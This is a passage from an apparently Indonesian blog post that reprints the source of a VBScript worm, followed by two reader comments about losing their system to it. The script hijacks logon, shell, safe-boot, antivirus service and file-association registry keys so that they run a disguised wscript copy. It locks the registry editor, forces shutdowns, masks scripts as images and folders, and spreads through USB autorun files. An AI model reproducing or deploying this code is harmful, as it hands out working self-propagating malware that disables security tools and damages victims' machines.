.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\CheckedValue”, 1, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\WarningIfNotDefault”, “Hei! Knapa kamu mo liat rahasia aq? Wlaupun qt tmnan, aq ttp punya rahasia yg g blh kamu tau!”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ControlPanel\Hide\CheckedValue”, “1″


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ControlPanel\Hide\DefaultValue”, “1″


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SystemFileProtection\ShowPopup”, 1, “REG_DWORD”



.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit”, “C:\WINDOWS\system32\userinit.exe, c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell”, “explorer.exe, c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\ComSpec”, “%SystemRoot%\system32\cmd.exe, c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PugPlay\ImagePath”, “%SystemRoot%\system32\services.exe, c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice\ImagePathservice”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NSCService\ImagePath”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVScan\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc\ImagePath”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCDrv\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McDetect.exe\ImagePath”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTskshd.exe\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mcupdmgr.exe\ImagePath”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer\ImagePath”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srservice\ImagePathservice”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_CLASSES_ROOT\regedit\Shell\open\Command”, “c:\windows\svchost.exe ” & qi


.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\open\command”, “c:\windows\svchost.exe ” & qi


.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\edit\command”, “c:\windows\svchost.exe ” & qi



.RegWrite “HKEY_CLASSES_ROOT\regedit\Shell\open\Command\”, “c:\windows\svchost.exe ” & qi


.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\open\command\”, “c:\windows\svchost.exe ” & qi


.RegWrite “HKEY_CLASSES_ROOT\regfile\Shell\edit\command\”, “c:\windows\svchost.exe ” & qi



.RegWrite “HKEY_CLASSES_ROOT\VBEFile\”, “JPEG Image”, “REG_EXPAND_SZ”


.RegWrite “HKEY_CLASSES_ROOT\VBSFile\”, “File Folder”, “REG_EXPAND_SZ”


.RegWrite “HKEY_CLASSES_ROOT\exefile\”, “my_mimi”, “REG_EXPAND_SZ”



.RegWrite “HKEY_CLASSES_ROOT\VBEFile\FriendlyTypeName”, “JPEG Image”, “REG_EXPAND_SZ”


.RegWrite “HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName”, “File Folder”, “REG_EXPAND_SZ”


.RegWrite “HKEY_CLASSES_ROOT\txtfileile\FriendlyTypeName”, “my_mimi documentation”, “REG_EXPAND_SZ”



.RegWrite “HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\”, dear.RegRead(”HKEY_CLASSES_ROOT\jpegfile\DefaultIcon\”)


.RegWrite “HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\”, dear.RegRead(”HKEY_CLASSES_ROOT\Folder\DefaultIcon\”)


.RegWrite “HKEY_CLASSES_ROOT\VBEFile\Shell\Edit\Command\”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”



.RegWrite “HKEY_CLASSES_ROOT\VBSFile\Shell\Edit\Command\”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”


.RegWrite “HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\VBEFile\Shell\Open\Command\”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_CLASSES_ROOT\Msi.Package\shell\Open\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\Msi.Package\shell\Open\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\Msi.Package\shell\Repair\command\”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_CLASSES_ROOT\Msi.Patch\shell\Open\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\batfile\shell\open\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\batfile\shell\edit\command\”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_CLASSES_ROOT\comfile\shell\open\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\cplfile\shell\cplopen\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\cplfile\shell\runas\command\”, “c:\windows\svchost.exe ” & mimi



.RegWrite “HKEY_CLASSES_ROOT\inffile\shell\Install\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\inffile\shell\Install\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\inffile\shell\open\command\”, “c:\windows\svchost.exe ” & heiji



.RegWrite “HKEY_CLASSES_ROOT\txtfile\shell\open\command\”, “c:\windows\svchost.exe ” & heiji


.RegWrite “HKEY_CLASSES_ROOT\txtfile\ScriptEngine\”, “VBScript.Encode”


.RegWrite “HKEY_CLASSES_ROOT\Folder\Shell\Scan For Viruses\Command\”, “c:\windows\svchost.exe ” & forest



.RegWrite “HKEY_CLASSES_ROOT\Folder\Shell\explore\command\command”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\Folder\Shell\open\command\command”, “wscript.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\edit\command”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”



.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command”, “c:\windows\svchost.exe ” & heiji


.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\edit\command\command”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”


.RegWrite “HKEY_CLASSES_ROOT\Applications\notepad.exe\shell\open\command\command”, “c:\windows\svchost.exe ” & heiji



.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.Document.1\shell\open\command”, “c:\windows\svchost.exe ” & heiji


.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.Document.1\shell\open\command\command”, “c:\windows\svchost.exe ” & heiji


.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.exe\shell\open\command”, “c:\windows\svchost.exe ” & heiji



.RegWrite “HKEY_CLASSES_ROOT\Applications\Wordpad.exe\shell\open\command\command”, “c:\windows\svchost.exe ” & heiji


.RegWrite “HKEY_CLASSES_ROOT\Applications\cedt.exe\shell\open\command\”, “c:\windows\svchost.exe ” & mimi


.RegWrite “HKEY_CLASSES_ROOT\Applications\cedt.exe\shell\edit\command\”, “%systemroot%\System32\Shutdown.exe -s -f”, “REG_EXPAND_SZ”



.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”


.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\RegEdt32\Settings\ReadOnly”, 1, “REG_SZ”


.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\RegEdt32\Settings\ReadOnly”, 1, “REG_SZ”



end with


End Sub


Sub dwozmc()


on error resume next


Dim love, dear, drive, drives, folder, files, file, nama, path, vir, subfolder, meteran, elo, cari


Set love = createobject(StrReverse(”tcejbOmetsySelif.gnitpircS”))


set drive = love.GetLogicalDrives


For Each drive In drives



If drive.IsReady Then


cari drive & “\”


DoEvents


End If


Next


dwozmc()


End Sub


Function cari()



on error resume next


Set love = createobject(StrReverse(”tcejbOmetsySelif.gnitpircS”))


Set folder = love.GetFolder(path)


nama = folder.name


for each file in folder.files


set elo = love.getfile(File.path)


meteran = (elo.size)/1024


ext = love.GetExtensionName(File.Path)



ext = StrReverse(LCase(ext))


vir = love.getbasename(file.path)


if ext = “sbv” or ext = “ebv” or ext = “cod” or ext = “ftr” or ext = “fdp” or ext = “gpj” then



set broken = love.createtextfile(File.Path & “.vbe”, 1)


broken.write lost


set friendship = love.getfile(File.Path & “.vbe”)


friendship.Attributes = 33


if file.name = “cotox.vbs” or file.name = “kangen.exe” or file.name = “indra.com” or file.name = “MSOHEV.EXE” or file.name = “SVCH0ST.EXE” or file.name = “WINL0G0N.EXE” or file.name = “Surat_Buat_Presiden.zip” or file.name = “Surat_Buat_Presiden.exe” or file.name = “indra.exe” or file.name = “for_you.exe” or file.name = “indra.pif” or file.name = “hallo.exe” or file.name = “icute.vbs” or file.name = “frzstate.exe” or file.name = “I-Cute.vbs” or file.name = “Perfected_v5.vbe” or file.name = “animasi.exe” or file.name = “C.Stankal.com” then



love.DeleteFile(File.path)


DoEvents


End if


if file.name = “msvbvm60.dll” then


love.RenameFile(File.path & “my_mimi.dll”)


DoEvents



End if


if vir = nama and ext = “exe” then


love.DeleteFile(File.path)


end if


DoEvents


For Each Subfolder In Folder.SubFolders


kejar Subfolder.Path



DoEvents


Next


End If


Next


End Function


sub ontrus()


on error resume next


dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd


atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe desktop.vbs”



set fs = createobject(”Scripting.FileSystemObject”)


set mf = fs.getfile(Wscript.ScriptFullname)


dim text,size


size = mf.size


check = mf.drive.drivetype


set text=mf.openastextstream(1,-2)


do while not text.atendofstream


mysource=mysource&text.readline



mysource=mysource & vbcrlf


loop


do


Set winpath = fs.getspecialfolder(0)


set tf = fs.getfile(winpath & “\desktop.vbs”)


tf.attributes = 0



set tf=fs.createtextfile(winpath & “\desktop.vbs”,2,true)


tf.write mysource


tf.close


set tf = fs.getfile(winpath & “\desktop.vbs”)


tf.attributes = 39


for each flashdrive in fs.drives



If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then


set tf = fs.getfile(flashdrive.path &”\desktop.vbs”)


tf.attributes = 0


set tf = fs.createtextfile(flashdrive.path &”\diary_mimi.vbe”,2,true)


tf.write mysource



tf.close


set tf = fs.createtextfile(flashdrive.path &”\desktop.vbs”,2,true)


tf.write mysource


tf.close


set tf = fs.getfile(flashdrive.path &”\desktop.vbs”)


tf.attributes = 39


set tf = fs.getfile(flashdrive.path &”\autorun.inf”)



tf.attributes = 0


set tf = fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)


tf.write atr


tf.close


set tf = fs.getfile(flashdrive.path &”\autorun.inf”)


tf.attributes = 39


on error resume next



set tf = fs.getfile(”c:\windows\system32\wscript.exe”)


tf.Attributes = 39


set tf = fs.getfile(”c:\windows\svchost.exe”)


tf.Attributes = 0


fs.copyfile “c:\windows\system32\wscript.exe”, “c:\windows\svchost.exe”



set tf = fs.getfile(”c:\windows\svchost.exe”)


tf.Attributes = 39


on error resume next


set tf = fs.getfile(”c:\windows\EXPL0RER.vbs”)


tf.attributes = 0


set tf = fs.createtextfile(”c:\windows\EXPL0RER.vbs”,2,true)



tf.write mysource


tf.close


set tf = fs.getfile(”c:\windows\EXPL0RER.vbs”)


tf.attributes = 39


on error resume next


set tf = fs.getfile(”c:\windows\system\WinUpdt.vbs”)


tf.attributes = 0



set tf = fs.createtextfile(”c:\windows\system\WinUpdt.vbs”,2,true)


tf.write mysource


tf.close


set tf = fs.getfile(”c:\windows\system\WinUpdt.vbs”)


tf.attributes = 39


tf.Close


set sd = createobject(”Wscript.shell”)



tachoor = “c:\windows\EXPL0RER.vbs”


sd.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32″, “c:\windows\svchost.exe ” & tachoor


end if


next


if check <> 1 then



Wscript.sleep 20000


end if


loop while check<>1


set sd = createobject(”Wscript.shell”)


sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname


end sub


————–[akhir scrpt]——————–




MEt PusIng KepaLA...hwawahahahah...

sumber: www.virologi.info

2 komentar:

Anonim mengatakan...

waaa virus ini sempat bikin aku mumettt mana waktu itu belum kenal temen2ku yang jago ngutak-atik kompie...

...dan berakhir dengan install ulang

pas aku serang di FS nya, dengan enteng dia bilang "reinstall aja"

haah hopeless deh

thank 4 da Info yaPh!

- Pasien tetap dr. Feiky -

Anonim mengatakan...

"dia" itu maksudnya si 'bapak'nya virus

Posting Komentar